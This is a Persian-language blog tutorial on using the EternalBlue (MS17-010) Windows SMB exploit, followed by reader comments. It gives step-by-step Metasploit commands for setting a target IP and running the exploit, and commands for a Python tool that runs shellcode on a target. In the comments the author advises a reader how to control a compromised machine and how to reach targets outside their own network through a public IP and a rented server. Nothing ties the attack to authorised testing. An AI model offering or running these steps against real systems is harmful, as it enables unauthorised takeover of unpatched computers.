اموزش اکسپلویت Eternalblue
اکسپلویت Eternalblue اموزش قدم به قدم و معرفی چندین ابزار حرفه ای برای استفاده از این اسیب پذیری
ابزار چک و تست اسیب پذیر بودن MS17-010 Eternalblue اموزش تصویری
اموزش کلی از اسیب پذیری اکسپلویت Eternalblue و توضیحات معرفی ان برای تمامی سیستم عامل ها
اموزش ابزار اکسپلویت Eternalblue
MS17-010
اموزش اکسپلویت Eternalblue چیست ؟
اکسپلویت نسبتا جدیدی که توسط هکر هایی از سیستم های سازمان NSA دزدیده شد
این اکسپلویت با استفاده از اسیب پذیری سرویس SMB ویندوز عمل میکند و باعث اجرای کد از راه دور میشود
سرویس های SMB به طور کلی در سیستم عامل فعال هستند و به همین دلیل بسیاری از سیستم های جهانی مورد خطر این اسیب پذیری قرار گرفته اند
و باید حتما از اپدیت های امنیتی یا فایل پچ این اسیب پذیری استفاده نمایند
چگونه میتوان از اکسپلویت Eternalblue استفاده کرد ؟
امروز که این اسیب پذیری بسیار دیده میشود ابزار هایی برای استفاده راحت از این اکسپلویت ساخته شده است
و در ادامه این اموزش چندین ابزار ساده و کاربردی برای این اسیب پذیری را معرفی خواهیم کرد همچنین همراه اموزش استفاده از ان
چه سیستم عامل هایی را شامل میشود ؟
- Windows XP
- Windows 2000
- Windows 2003 R2
- Windows 2008 R2
- Windows 2012 R2
- Windows 7 SP1
- Windows 8.1
- Windows 2016
- Windows 10
سطح دسترسی
با این اکسپلویت میتوانید از راه دور شل کد خود را اجرا کنید و به صورت کامل دسترسی خود را به سیستم مورد نظر بگیرید
راه رفع این اسیب پذیری بهرانی استفاده از اپدیت های امنیتی سیستم عامل میباشد همچنین میتونید فایل رف این اسیب پذیری را به صورت جدا گانه دانلود و نصب نمایید
نکته
از جمله میتوان برای این اسیب پذیری مشکلات بزرگی را مثال زد مانند استفاده بات نت ها و باج افزار ها برای نفوذ و باج گیری همانند باج افزار wannacry که باعث خسارت های بسیاری شد
نصب
یکی از راه های استفاده از اکسپلویت Eternalblue استفاده از ان در متااسپلویت میباشد که در نسخه جدید ان افزوده شده است
در صورت موجود نودن در متااسپلوت متااسپلوست خود را اپدیت نمایید با استفاده از دستور زیر
msfupdate
اجرای اکسپلویت در متااکسپلویت
اجرای متا
msfconsole
انتخاب اکسپلویت
use address/smb/smb_ms17_010
نمایش اطلاعات ست شده
options
ست کردن ایپی سیستم
set rhosts ip_server
ست کردن پورت اکسپلویت که به صورت پیشفرض هم موجود است
set rport 445
اجرا یا run
exploit
(همچنین میتوانید به صورت دستی فایل را به متااسپلویت خود اضافه کنید لینک در اخر صفحه میباشد.)
اجرای اکسپلویت با ابزار
ابزاری عالی برای استفاده از MS17-010 نوشته شده به زبان پاتون و برای سیستم عامل های مختلف
دانلود ابزار با استفاده از دستور زیر
git clone link
چک کردن اسیب پذیر بودن سیستم مورد نظر با استفاده از ایپی سیستم
python checker.py ip_server
اجرای شل کد بر روی سیستم با استفاده از اکسپلویت
python exploit.py ip_server shellcode
معرفی ابزاری دیگر نشوته شده با زبان ruby لینک در اخر مطلب
اجرا با دستور زیر
نکته : در استفاده از این اکسپلویت ها پایتون و یا روبی به روی سیستم خود نصب کنید به طور پیشفرض بر روی کالی لینوکس که در تصاویر میبینید نصب میباشد.
فایل های ابزار اکسپلویت Eternalblue :
[ برای درافت فایل وارد شوید و یا ثبت نام کنید! ]
۹ دیدگاه در “اموزش اکسپلویت Eternalblue”
سلام استاد عزیز
استاد یه سوال ازتون داشتم : بعد از اینکه اکسپلویت را اجرا کردیم چطور ویندوز مقابل راکنترل کنیم شما گفتین همراه شل ها و یا meterpreter ولی چگونه ! اگه امکانش بود یک ویدیو در این مورد نشر می کردین خوب بود باز هم از این آموزش طلائی تان متشکر هستم ممنون از بابت تلاش هایتان. بدرود
درود بر شما
برای مشاهده راهنما از دستور help استفاده کنید تمامی امکانات برای کنترل سیستم را مشاهده خواهید کرد.
موفق باشید.
سلام استاد خسته نباشید ببخشید در قسمت آی پی اینگونه اکسپلویت ها باید آی پی پابلیک رو بدیم یا آی پی خصوصی شبکه داخلیمون ؟
البته میخام خارج از شبکه استفاده کنم و از راه دور دسترسی بگیرم
و اینکه باید یه سرور راه اندازی کنم واسه این کار ؟؟
درود و تشکر
باید برای خارج از شبکه ای پی پابلیک داشته باشید.
می توانید یک سرور مجازی برای اینکار تهیه کنید.
سلام خسته نباشید
میخواستم بدونم میشه اکسپلوییت اسیب پذیری stagefrightبرای اندروید۴درتبلت asusنوشت¿
درود و تشکر
بله ممکن است.
ممنون عالی بود.
به نوعی دسترسی ریموت بهمون میده؟
سلام من هیچی نمیدونم ازاین نرم افزارها ولی میخوام یادبگیرم چکار باید کرد
درود
دوره اموزش کالی لینوکس می تواند کمک شما کند.